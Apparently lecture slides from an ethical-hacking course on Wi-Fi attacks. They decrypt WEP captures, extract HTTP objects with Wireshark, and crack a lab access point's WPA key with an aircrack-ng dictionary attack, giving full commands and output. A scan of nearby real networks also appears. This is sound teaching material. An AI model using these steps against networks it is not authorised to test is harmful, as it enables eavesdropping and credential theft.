root@eh-kali-05:~# airdecap-ng -w BEEFBEEF22 airportSniffENFGOR.cap
Total number of packets read 17842
Total number of WEP data packets 7223
Total number of WPA data packets 57
Number of plaintext data packets 1
Number of decrypted WEP packets 7156
Number of corrupted WEP packets 0
Number of decrypted WPA packets 0
root@eh-kali-05:~#

Decrypting the packet capture file with the cracked password

ls -l airportSniffENFGOR*
root@eh-kali-05:~# ls -l airportSniffENFGOR*
Encrypted
-rw-r--r-- 1 root root 6704919 Nov 21 12:31 airportSniffENFGOR.cap
-rw-r--r-- 1 root root 4648498 Nov 21 11:10 airportSniffENFGOR-dec.cap Decrypted
root@eh-kali-05:~#

Comparing the encrypted and decrypted packet capture files

117
 CIS 76 - Lesson 13

Getting files from packet captures

wireshark airportSniffENFGOR-dec.cap

118
We see traditional traffic now in the decrypted capture
 CIS 76 - Lesson 13

File > Export Objects > HTTP 119

 CIS 76 - Lesson 13

Getting files from packet captures

120
A list of HTTP objects. Click the Save All button.
 CIS 76 - Lesson 13

Getting files from packet captures

Click the "Create Folder" icon at the upper right 121

 CIS 76 - Lesson 13

Getting files from packet captures

122
Name the new directory and click Create button
 CIS 76 - Lesson 13

Getting files from packet captures

123
Click the Open button to saves the HTTP objects in the new leson13a directory
 CIS 76 - Lesson 13

Getting files from packet captures

124
Click OK to acknowledge some files could not be saved
CIS 76 - Lesson 13

125
Click Close to finish
 CIS 76 - Lesson 13

Activity

As root, on your EH-Kali-XX VM:

1) scp [email protected]:../depot/lesson13/* .

2) airdecap-ng -w BEEFBEEF22 airportSniffENFGOR.cap

3) Run Wireshark on the decrypted airportSniffENFGOR-dec.cap file.

4) File > Export Objects > HTTP

5) Create a new lesson13a directory.

6) Save all the objects in the new directory.

When finished note it in the chat window.

126
 CIS 76 - Lesson 13

Getting files from packet captures

From the Kali desktop select Places > Home 127

 CIS 76 - Lesson 13

Getting files from packet captures

128
Open the new directory where the objects were saved
 CIS 76 - Lesson 13

Getting files from packet captures

View the objects found in the decrypted packet capture 129

 CIS 76 - Lesson 13

Getting files from packet captures

/root/lesson13a/_92592606_354d2441-d7ac-4a91-8df6-1447a909bd00(1).jpg

130
Find and open a .jpg file used one the BBC website
 CIS 76 - Lesson 13

Getting files from packet captures

file:///root/lesson13a/blogs-trending-38002276

131
Find and open a .html file on BBC website
 CIS 76 - Lesson 13

Getting files from packet captures

/root/lesson13a/bump-3.js

132
Find and open a JavaScript file on the BBC website
 CIS 76 - Lesson 13

Filtering for PDF documents

But the PDF from my website was not found! 133

 CIS 76 - Lesson 13

Activity

As root, on your EH-Kali-XX VM:

1) Explore the new lesson13a directory.

2) Find a jpg file.

3) Find a html file.

4) Find a javascript file.

Put the names of any interesting files you find in the chat window

134
 CIS 76 - Lesson 13

Activity

https://simms-teach.com/docs/cis76/cis76lab01.pdf

Why are there no PDF frames in the capture?

Write your answer in the chat window.

135
 CIS 76 - Lesson 13

Capture
yG7m8J

More Practice
136
 CIS 76 - Lesson 13

airportSniffyG7m8J.cap

http://www.skyhighway.com/~marysimms/exercise8.html

http://www.skyhighway.com/~elizsimms/cis83/docs
/portfolio-lab-VLAN.pdf
137
 CIS 76 - Lesson 13

ls -l airportSniffyG7m8J.cap
root@eh-kali-05:~# ls -l airportSniffyG7m8J.cap
-rw-r--r-- 1 root root 3095355 Nov 21 12:31 airportSniffyG7m8J.cap
root@eh-kali-05:~#

file airportSniffyG7m8J.cap
root@eh-kali-05:~# file airportSniffyG7m8J.cap
airportSniffyG7m8J.cap: tcpdump capture file (little-endian) - version 2.4 (802.11 with
radiotap header, capture length 2147483647)
root@eh-kali-05:~#

This file contains encrypted packets captured on a wireless network

using a Mac and transferred to the EH-Kali VM
138
 CIS 76 - Lesson 13

Beacon frame in encrypted packet capture file 139

 CIS 76 - Lesson 13

airdecap-ng -w BEEFBEEF22 airportSniffyG7m8J.cap

root@eh-kali-05:~# airdecap-ng -w BEEFBEEF22 airportSniffyG7m8J.cap
Total number of packets read 8203
Total number of WEP data packets 2375
Total number of WPA data packets 181
Number of plaintext data packets 0
Number of decrypted WEP packets 2255
Number of corrupted WEP packets 0
Number of decrypted WPA packets 0
root@eh-kali-05:~#

Decrypting the packet capture file using the cracked password

ls -l airportSniffy*
root@eh-kali-05:~# ls -l airportSniffy*
-rw-r--r-- 1 root root 3095355 Nov 21 12:31 airportSniffyG7m8J.cap Encrypted
-rw-r--r-- 1 root root 1354295 Nov 21 13:12 airportSniffyG7m8J-dec.cap
Decrypted
root@eh-kali-05:~#

Comparing the encrypted and decrypted versions of the file

140
 CIS 76 - Lesson 13

141
Decrypted packet capture showing normal traffic
 CIS 76 - Lesson 13

142
Extracting objects from the capture
CIS 76 - Lesson 13

143
Make a new directory
CIS 76 - Lesson 13

144
Make a new directory
CIS 76 - Lesson 13

145
Make a new directory
CIS 76 - Lesson 13

146
Make a new directory
CIS 76 - Lesson 13

147
Make a new directory
CIS 76 - Lesson 13

148
Save all to the new directory
 CIS 76 - Lesson 13

Activity

As root, on your EH-Kali-XX VM:

1) scp [email protected]:../depot/lesson13/* .

2) airdecap-ng -w BEEFBEEF22 airportSniffyG7m8J.cap

3) Run Wireshark on the decrypted airportSniffyG7m8J-dec.cap file.

4) Exfiltrate all HTTP objects from the capture file and place them in a
directory named lesson13b in your home directory.

When finished note it in the chat window.

149
 CIS 76 - Lesson 13

Places > home, then open the new folder 150

CIS 76 - Lesson 13

151
 CIS 76 - Lesson 13

Activity

As root, on your EH-Kali-XX VM:

1) Explore the exfiltrated objects in the lesson13b directory.

2) Locate the portfolio-lab-VLAN.pdf file and look at the network

diagram on the first page.

3) What is the IP address on the Cisco router for VLAN 20?

Write your answer in the chat window.

152
 CIS 76 - Lesson 13

Activity

As root, on your EH-Kali-XX VM:

1) Explore the exfiltrated objects in the lesson13b directory.

2) Find the extracted coup-600x742.jpg file

3) Of the two options, what do you think Benji decided to do?

Write your answer in the chat window.

153
 CIS 76 - Lesson 13

Wireless
WPA/WPA2
Hacking
154
 CIS 76 - Lesson 13

Wi-Fi Protected Access (WPA)

WPA
• Developed in 2003 to replace WEP.
• Still uses WEP's insecure RC4 stream cipher
• Uses Temporal Key Integrity Protocol (TKIP) to
provide extra security.
• More secure than WEP.

WPA2
• Developed in 2004 to replace WEP and WPA.
• Uses AES instead of RC4.
• Replaces TKIP with Counter Mode Cipher
Block Chaining Message Authentication Code
Protocol (CCMP).
• More secure than WPA.

As of March 2006, all devices using the Wi-Fi trademark must be WPA2 certified
155
http://www.diffen.com/difference/WPA_vs_WPA2
 CIS 76 - Lesson 13

WPA and WPA2

Marcus Burton

https://www.youtube.com/watch?v=hLQ5rYNUwNg

6:46 - 7:15: Notes a PSK (pre-shared key) is vulnerable to dictionary attacks 156
 CIS 76 - Lesson 13

The 4-Way Handshake

Marcus Burton

A "nonce" is
introduced in
this video
(1:50 - 2:05)

https://www.youtube.com/watch?v=9M8kVYFhMDw

This video discussed the WPA 4-way authentication handshake. Note we will use
157
aircrack-ng later to crack a PSK (pre-shared key) making use of this handshake.
 CIS 76 - Lesson 13

How to Hack WPA/WPA2 Wi-Fi

With Kali Linux Aircrack-ng

Ink That! Offensive Security

This video does a full

walkthrough of cracking
a WPA2 password

https://www.youtube.com/watch?v=ngxzSlsP1JU
158
 CIS 76 - Lesson 13

WPA/WPA2 Cracking with a Linksys WAP54G Access Point

BSSID STA
= Basic Service Set Identifier = Station
= AP Mac Address = MacBook Pro
= 00:06:25:4b:21:b4

Attacker

Linksys
WAP54G STA
= Station
= Win 10 PC
SSID
= Service Set Identifier Victim
= Name of the network
= linkysys
159
 CIS 76 - Lesson 13

Linksys WAP54G

For this example we will use WPA (WiFi Protected Access)

160
 CIS 76 - Lesson 13

Linksys WAP54G

Using Mixed Mode (B and G), SSID=linkysys, Channel 5 161

CIS 76 - Lesson 13

Linksys WAP54G

Select a WPA shared key 162

 CIS 76 - Lesson 13

Sniffing using MacBook Pro

airport -s
Richards-MBP:~ rsimms$ airport -s
SSID BSSID RSSI CHANNEL HT CC SECURITY
(auth/unicast/group)
xfinitywifi 22:86:8c:6c:82:4a -85 6 Y US NONE
xfinitywifi 96:0d:cb:ff:f4:d0 -89 11 Y US NONE
2WIRE341 00:22:a4:dd:8c:c9 -85 9 N US WEP
HOME-F4D2 90:0d:cb:ff:f4:d0 -89 11 Y US
WPA(PSK/TKIP,AES/TKIP) WPA2(PSK/TKIP,AES/TKIP)
xfinitywifi 74:85:2a:80:f5:e1 -91 157 Y US NONE
HOME-5 74:85:2a:80:f5:e0 -91 157 Y US
WPA(PSK/AES,TKIP/TKIP) WPA2(PSK/AES,TKIP/TKIP)
BenjiNet_5G 2c:56:dc:85:3e:ec -57 157 Y -- WPA2(PSK/AES/AES)
DIRECT-F0-HP ENVY 7640 series a0:8c:fd:72:68:f1 -77 6 Y -- WPA2(PSK/AES/AES)
linkysys 00:06:25:4b:21:b4 -46 5 N -- WPA(PSK/AES/AES)
HOME-2.4 74:85:2a:80:f5:d8 -86 1 Y US
WPA(PSK/AES,TKIP/TKIP) WPA2(PSK/AES,TKIP/TKIP)
ATT288 3c:36:e4:22:95:80 -70 1 Y --
WPA(PSK/AES,TKIP/TKIP) WPA2(PSK/AES,TKIP/TKIP)
uLab-WiFiNet 4c:5e:0c:ca:25:c0 -37 1,+1 Y -- WPA2(PSK/AES/AES)
HP-Print-7B-Officejet 6600 6c:3b:e5:00:53:7b -87 9 N -- WPA2(PSK/AES/AES)
Guest d8:50:e6:59:0b:fa -86 8 Y -- WPA2(PSK/AES/AES)
Shauna d8:50:e6:59:0b:f9 -87 8 Y -- WPA2(PSK/AES/AES)
MODWARE d8:50:e6:59:0b:f8 -86 8 Y -- WPA2(PSK/AES/AES)
BenjiNet 2c:56:dc:85:3e:e8 -44 8 Y -- WPA2(PSK/AES/AES)
Richards-MBP:~ rsimms$

On a Mac, using the built in airport command with an -s option will scan all
available WiFi networks. The linkysys network on channel 5 is using WPA. 163
 CIS 76 - Lesson 13

Activity

Look at the airport -s output on the previous slide

1) Is the Guest SSID network security NONE, WEP, WPA or WPA2?

2) Do you see any wireless networks that are open with no encryption?

Write your answer in the chat window.

164
 CIS 76 - Lesson 13

Sniffing using MacBook Pro

[on MacBook Pro] airport en0 sniff 5
Richards-MBP:~ rsimms$ airport en0 sniff 5
Capturing 802.11 frames on en0.
^CSession saved to /tmp/airportSniff1QXjSX.cap.
Richards-MBP:~ rsimms$

Let's start sniffing the channel used by the access point for the SSID linkysys. Use
control-C to stop the capture.

[on MacBook Pro] ls -lth /private/tmp/airportSniff*.cap

Richards-MBP:~ rsimms$ ls -lth /private/tmp/airportSniff*.cap
-rw-r--r-- 1 rsimms wheel 7.3M Nov 21 18:45 /private/tmp/airportSniff1QXjSX.cap
-rw-r--r-- 1 rsimms wheel 3.0M Nov 21 11:40 /private/tmp/airportSniffyG7m8J.cap
-rw-r--r-- 1 rsimms wheel 6.4M Nov 21 10:14 /private/tmp/airportSniffENFGOR.cap
-rw-r--r-- 1 rsimms wheel 39M Nov 21 08:41 /private/tmp/airportSniffdZH641.cap
-rw-r--r-- 1 rsimms wheel 69M Nov 21 08:26 /private/tmp/airportSniff8FkDVL.cap
-rw-r--r-- 1 rsimms wheel 108M Nov 20 20:36 /private/tmp/airportSniffk44M58.cap
-rw-r--r-- 1 rsimms wheel 23M Nov 20 19:39 /private/tmp/airportSniffKzpvq8.cap
-rw-r--r-- 1 rsimms wheel 4.4M Nov 20 19:16 /private/tmp/airportSniffFVOuaV.cap
-rw-r--r-- 1 rsimms wheel 497K Nov 20 16:22 /private/tmp/airportSniffh69ghh.cap
-rw-r--r-- 1 rsimms wheel 990K Nov 20 16:14 /private/tmp/airportSniffdLJDh2.cap
-rw-r--r-- 1 rsimms wheel 2.4M Nov 20 16:05 /private/tmp/airportSniffIhmspR.cap
-rw-r--r-- 1 rsimms wheel 1.5M Nov 20 14:28 /private/tmp/airportSniffA8hduu.cap
Richards-MBP:~ rsimms$
165
The packets are captured and dumped into a new file in the /private/tmp directory
 CIS 76 - Lesson 13

Capture

1QXjSX
166
 CIS 76 - Lesson 13

airportSniff1QXjSX.cap

http://hayrocket.com/cabrillo/dm160b/

http://hayrocket.com/cabrillo/dm160b/final/

167
 CIS 76 - Lesson 13

scp -p [email protected]:../depot/lesson13/* .
root@eh-kali-05:~# scp -p [email protected]:../depot/lesson13/* .
[email protected]'s password:
airportSniff1QXjSX.cap 100% 7510KB 7.3MB/s 00:00
airportSniffdZH641.cap 100% 39MB 38.5MB/s 00:01
airportSniffENFGOR.cap 100% 6548KB 6.4MB/s 00:00
airportSniffyG7m8J.cap 100% 3023KB 3.0MB/s 00:00
root@eh-kali-05:~#

Obtain the packet capture files

scp [email protected]:../depot/randomwords .
root@eh-kali-05:~# scp [email protected]:../depot/randomwords .
[email protected]'s password:
randomwords 100% 4838KB
4.7MB/s 00:00
root@eh-kali-05:~#

Obtain the word list of potential passwords

168
 CIS 76 - Lesson 13

ls -lah air*
root@eh-kali-05:~# ls -lah air*
-rw-r--r-- 1 root root 7.4M Nov 21 18:45 airportSniff1QXjSX.cap
-rw-r--r-- 1 root root 39M Nov 21 10:21 airportSniffdZH641.cap
-rw-r--r-- 1 root root 6.4M Nov 21 10:14 airportSniffENFGOR.cap
-rw-r--r-- 1 root root 4.5M Nov 21 11:10 airportSniffENFGOR-dec.cap
-rw-r--r-- 1 root root 3.0M Nov 21 11:40 airportSniffyG7m8J.cap
-rw-r--r-- 1 root root 1.3M Nov 21 13:12 airportSniffyG7m8J-dec.cap
root@eh-kali-05:~#

This is a capture of wireless traffic on channel 5 that includes WPA

encrypted linkysys traffic

169
 CIS 76 - Lesson 13
Wireshark View of Captured Channel 5 802.11 Packets
wireshark airportSniff1QXjSX.cap

BSSID

SSID

170
A linkysys network beacon frame from our access point
 CIS 76 - Lesson 13

aircrack-ng airportSniff1QXjSX.cap
root@eh-kali-05:~# aircrack-ng airportSniff1QXjSX.cap
Opening airportSniff1QXjSX.cap
Read 29202 packets.

# BSSID ESSID Encryption

1 44:A2:78:BA:59:02 Unknown
2 D8:50:E6:59:0B:F8 MODWARE No data - WEP or WPA
3 D8:50:E6:59:0B:FA Guest WPA (0 handshake)
4 2C:56:DC:85:3E:E8 BenjiNet WPA (0 handshake)
5 00:22:A4:DD:8C:C9 2WIRE341 No data - WEP or WPA
6 D8:50:E6:59:0B:F9 Shauna No data - WEP or WPA
7 82:35:A4:DD:8C:C9 WEP (1 IVs) Capturing a
8 8B:F3:16:85:58:A9 WEP (1 IVs)
handshake is
9 15:D4:65:A0:E0:7E WEP (1 IVs)
10 00:06:25:4B:21:B4 linkysys WPA (1 handshake) necessary to
11 BC:CA:B5:F1:33:60 PandaRouter No data - WEP or WPA cracking the
12 66:6A:AA:B7:5D:21 Unknown pre-shared key
13 4C:5E:0C:CA:25:C0 uLab-WiFiNet WPA (0 handshake) (password)
14 F6:37:6A:50:91:D8 WPA (0 handshake)
15 AE:18:C3:90:50:D2 WPA (0 handshake)
16 67:33:E4:FC:9B:1C Unknown
17 BE:CA:B5:F1:33:60 �{�?���U�����+?�?0??? No data - WEP or WPA
18 22:86:8C:6C:82:4A xfinitywifi None (0.0.0.0)
19 27:78:F7:DE:2F:CC WPA (0 handshake)
20 10:86:8C:6C:82:4A Weiser No data - WEP or WPA
Snipped and use Ctrl-C when it hangs :(
171
The BSSID for linkysys is 00:06:25:4B:21:B4 and we have one authentication handshake
 CIS 76 - Lesson 13

Captured channel List of potential BSSID of

5 WiFi packets passwords linkysys network

aircrack-ng airportSniff1QXjSX.cap -w randomwords -b 00:06:25:4B:21:B4

Opening airportSniff1QXjSX.cap
Reading packets, please wait...

"WPA/WPA2
supports many
types of
authentication
beyond pre-shared
keys. aircrack-ng
can ONLY crack
pre-shared keys."
https://www.aircrack-
ng.org/doku.php?id=crack
ing_wpa

172
 CIS 76 - Lesson 13

Activity

As root, on your EH-Kali-XX VM:

scp [email protected]:../depot/lesson13/* .
scp [email protected]:../depot/randomwords .

aircrack-ng airportSniff1QXjSX.cap -w randomwords -b 00:06:25:4B:21:B4

What is the WPA shared key? Write your answer in the chat window

173
 CIS 76 - Lesson 13
root@eh-kali-05:~# time aircrack-ng airportSniff1QXjSX.cap -w randomwords -b
00:06:25:4B:21:B4
Opening airportSniff1QXjSX.cap
Reading packets, please wait...

Aircrack-ng 1.2 rc4

[00:08:36] 338052/338328 keys tested (658.54 k/s)

Time left: 0 seconds 99.92%

KEY FOUND! [ Hornblower ]

Master Key : 95 5B CA 0F 59 BE 99 2E 64 F7 88 71 6A 66 71 57
CA B8 8D CC 54 1A 4E 09 6C 1A AC E3 F3 4B 22 C6

Transient Key : B4 E3 8A 3B DF E9 60 A9 49 04 B8 FF D7 1F 4F 75
85 2D C3 E2 8B 51 EE E7 C1 CA 36 17 21 D8 22 9F
24 6D C4 90 DF 13 F0 30 F3 BE C1 CF BF 15 C8 82
26 EA 2D F2 23 5D 01 11 42 C5 3B 4F EF 03 46 40

EAPOL HMAC : 94 AC F7 08 0D 7F 1F 02 BA 65 7C 9A 7A EE F3 B1

real 8m36.989s
user 8m30.784s
sys 0m2.488s
root@eh-kali-05:~#

174
Using time to see how long it takes
 CIS 76 - Lesson 13

Wireshark View of Captured Channel 5 802.11 Packets

175
A linkysys network beacon frame from our access point
 CIS 76 - Lesson 13

airdecap-ng -p Hornblower -e linkysys airportSniff1QXjSX.cap

root@eh-kali-05:~# airdecap-ng -p Hornblower -e linkysys airportSniff1QXjSX.cap

Total number of packets read 29202
Total number of WEP data packets 157
Total number of WPA data packets 7447
Number of plaintext data packets 0
Number of decrypted WEP packets 0
Number of corrupted WEP packets 0
Number of decrypted WPA packets 2301
root@eh-kali-05:~#

root@eh-kali-05:~# ls -lth air*

-rw-r--r-- 1 root root 861K Nov 21 22:52 airportSniff1QXjSX-dec.cap
-rw-r--r-- 1 root root 7.4M Nov 21 18:45 airportSniff1QXjSX.cap
-rw-r--r-- 1 root root 1.3M Nov 21 13:12 airportSniffyG7m8J-dec.cap
-rw-r--r-- 1 root root 3.0M Nov 21 11:40 airportSniffyG7m8J.cap
-rw-r--r-- 1 root root 4.5M Nov 21 11:10 airportSniffENFGOR-dec.cap
-rw-r--r-- 1 root root 39M Nov 21 10:21 airportSniffdZH641.cap
-rw-r--r-- 1 root root 6.4M Nov 21 10:14 airportSniffENFGOR.cap
root@eh-kali-05:~#

Decrypt the packet capture file

176
 CIS 76 - Lesson 13

Wireshark View of Decrypted Captured Packets

wireshark airportSniff1QXjSX-dec.cap

177
Viewing the decrypted packets using Wirehshark
CIS 76 - Lesson 13

178
 CIS 76 - Lesson 13

Activity

As root, on your EH-Kali-XX VM:

1) scp [email protected]:../depot/lesson13/* .

2) airdecap-ng -p Hornblower -e linkysys airportSniff1QXjSX.cap

3) Run Wireshark on the decrypted airportSniff1QXjSX-dec.cap file.

4) File > Export Objects > HTTP

5) Create a new lesson13c directory.

6) Save all the objects in the new directory.

When finished note it in the chat window. 179

CIS 76 - Lesson 13

180
CIS 76 - Lesson 13

181
CIS 76 - Lesson 13

182
CIS 76 - Lesson 13

183
 CIS 76 - Lesson 13

Activity

As root, on your EH-Kali-XX VM:

1) Find the extracted config-switch2.html file.

2) What is the password used on this Cisco switch?

Write your answer in the chat window.

184
 CIS 76 - Lesson 13

Deauth
Rogue AP
Attacks
Placeholder
185
 CIS 76 - Lesson 13

https://simms-teach.com/howtos/students/WiFi-Penetration-Schell.pdf

Ryan's WiFi penetration testing presentation

186
CIS 76 - Lesson 13

Krack

187
 CIS 76 - Lesson 13

Serious flaw in WPA2 protocol lets attackers intercept

passwords and much more
DAN GOODIN - 10/15/2017, 9:37 PM

https://arstechnica.com/information-
technology/2017/10/severe-flaw-in-
wpa2-protocol-leaves-wi-fi-traffic-open-
to-eavesdropping/

KRACK attack is
especially bad news for
Android and Linux users.

"Researchers have disclosed a serious weakness in the WPA2 protocol that allows
attackers within range of vulnerable device or access point to intercept passwords,
e-mails, and other data presumed to be encrypted, and in some cases, to inject
ransomware or other malicious content into a website a client is visiting."
188
 CIS 76 - Lesson 13

Krack Attacks (WiFi WPA2 Vulnerability)

Dr Mike Pound & Dr Steve Bagley

https://www.youtube.com/watch?v=mYtvjijATa4

189
 CIS 76 - Lesson 13

Assignment

190
 CIS 76 - Lesson 13

Final Project

Due in two weeks

https://simms-
teach.com/docs/cis76/cis76final-project.pdf
191
 CIS 76 - Lesson 13

Wrap up

192
 CIS 76 - Lesson 13

Next Class
Assignment: Check the Calendar Page on the web site to
see what is due next week.

Quiz questions for next class:

• No more quizzes!

193
 CIS 76 - Lesson 13

Backup
194